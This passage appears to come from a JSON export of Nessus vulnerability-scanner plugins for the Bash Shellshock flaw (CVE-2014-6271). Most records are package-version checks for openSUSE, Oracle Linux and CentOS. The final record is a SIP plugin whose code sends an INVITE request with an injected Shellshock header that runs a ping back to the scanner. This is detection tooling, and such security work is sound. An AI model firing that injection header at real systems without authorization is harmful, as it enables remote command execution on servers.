As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898884\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", 
reference:\"libreadline6-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:38", "description": "From Red Hat Security Advisory 2014:1294 :\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. 
Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-1294) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-1294.NASL", "href": "https://www.tenable.com/plugins/nessus/77849", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1294 and \n# Oracle Linux Security Advisory ELSA-2014-1294 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77849);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"RHSA\", value:\"2014:1294\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-1294) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:1294 
:\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat\nEnterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended\nUpdate Support, Red Hat Enterprise Linux 6.2 Advanced Update Support,\nand Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004473.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:36", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2014-1293.NASL", "href": "https://www.tenable.com/plugins/nessus/77835", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1293 and \n# CentOS Errata and Security Advisory 2014:1293 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77835);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"RHSA\", value:\"2014:1293\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. 
Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020582.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?218f06b1\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020583.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f85a2dec\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020585.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93307af1\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020650.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3adf2ea1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:24:21", "description": "The remote host appears to be running SIP. 
SIP itself is not vulnerable to Shellshock; however, any Bash script that SIP runs for filtering or other routing tasks could potentially be affected if the script exports an environmental variable from the content or headers of a SIP message.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that any scripts the SIP proxy may be running do not create the conditions that are exploitable via the Shellshock flaw.", "cvss3": {}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "SIP Script Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "SHELLSHOCK_SIP_INVITE.NASL", "href": "https://www.tenable.com/plugins/nessus/78822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78822);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"SIP Script Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SIP server uses scripts that allow remote command execution\nvia Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running SIP. 
SIP itself is not\nvulnerable to Shellshock; however, any Bash script that SIP runs for\nfiltering or other routing tasks could potentially be affected if the\nscript exports an environmental variable from the content or headers\nof a SIP message.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that any scripts\nthe SIP proxy may be running do not create the conditions that are\nexploitable via the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch or remove the affected SIP scripts /\nmodules.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sip_detection.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/sip\", 5060);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! 
thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc:\"sip\", ipproto:\"udp\", default:5060, exit_on_fail:1);\n\n# Open connection to SIP.\nsoc = open_sock_udp(port);\n\nif (!soc) audit(AUDIT_SOCK_FAIL,\"SIP\",port);\n\n#\n# setup unique id for pingback\n#\nid_tag = hexstr(rand_str(length:10));\n\n#\n# build INVITE request\n#\nraddress = get_host_ip();\nladdress = compat::this_host();\nrn = raw_string(0x0d, 0x0a);\n\ndata = \"INVITE sip:nessus@\" + raddress + \" SIP/2.0\" + rn +\n\"Via: SIP/2.0/UDP \" + laddress + \":5062;branch=z9hG4bK23000023\" + rn +\n'From: \\\"Nessus\\\" <sip:nessus@' + raddress + \">;tag=999888777\" + rn +\n\"To: <sip:@\" + raddress + \">\" + rn +\n\"Call-ID: 23@\" + laddress + rn +\n\"CSeq: 1 INVITE\" + rn +\n\"Contact: <sip:nessus@\" + laddress + \":5062>\" + rn +\n\"Content-Type: application/sdp\" + rn +\n\"Max-Forwards: 13\" + rn +\n\"User-Agent: NESSUS\" + rn +\n\"SHELLSHOCK: () { :;}; ping -c 10 -p '\" + string(id_tag) + \"' \" + laddress + rn +\n\"Content-Length: 0\" + rn + rn;\n\n#\n# send SIP INVITE\n#\n\n# See if we get a response\nfilter = \"icmp and icmp[0] = 8 and src host \" + raddress;\ns = send_capture(socket:soc, data:data, pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || id_tag >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"SIP\",port);\n\nreport = NULL;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n' + 'Nessus was able to exploit CVE-2014-6271 (Shellshock) using a specially' +\n '\\n' + 'crafted INVITE request.' 
